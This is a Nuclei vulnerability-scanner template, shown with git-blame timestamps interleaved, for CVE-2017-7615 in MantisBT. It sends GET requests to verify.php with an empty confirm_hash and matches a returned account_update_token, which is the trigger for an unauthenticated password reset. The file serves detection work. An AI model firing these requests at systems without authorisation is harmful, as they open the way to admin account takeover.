nuclei-templates/cves/2017/CVE-2017-7615.yaml

44 lines
1.5 KiB
YAML
Raw Normal View History

2021-01-02 05:02:50 +00:00
id: CVE-2017-7615
2020-09-24 18:34:36 +00:00
info:
name: CVE-2017-7615
2021-06-09 12:20:56 +00:00
author: bp0lr,dwisiswant0
2020-09-24 18:34:36 +00:00
severity: high
description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
tags: cve,cve2017,mantisbt
2020-10-03 06:10:14 +00:00
# THIS TEMPLATE IS ONLY FOR DETECTING
# To carry out further attacks, please see reference[2] below.
# This template works by guessing user ID.
# MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on reference[1].
reference:
2021-04-18 13:02:50 +00:00
- https://sourceforge.net/projects/mantisbt/files/mantis-stable/
- http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt
- https://www.exploit-db.com/exploits/41890
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
cve-id: CVE-2017-7615
cwe-id: CWE-640
2020-09-24 18:34:36 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/verify.php?id=1&confirm_hash="
- "{{BaseURL}}/mantis/verify.php?id=1&confirm_hash="
- "{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash="
- "{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash="
2020-10-03 06:10:14 +00:00
- "{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1"
2021-10-09 05:15:09 +00:00
stop-at-first-match: true
2020-09-24 18:34:36 +00:00
matchers-condition: and
matchers:
- type: word
words:
2020-10-03 06:10:14 +00:00
- "<input type=\"hidden\" name=\"account_update_token\" value=\"([a-zA-Z0-9_-]+)\""
2020-09-24 18:34:36 +00:00
part: body
- type: status
status:
2021-10-09 05:15:09 +00:00
- 200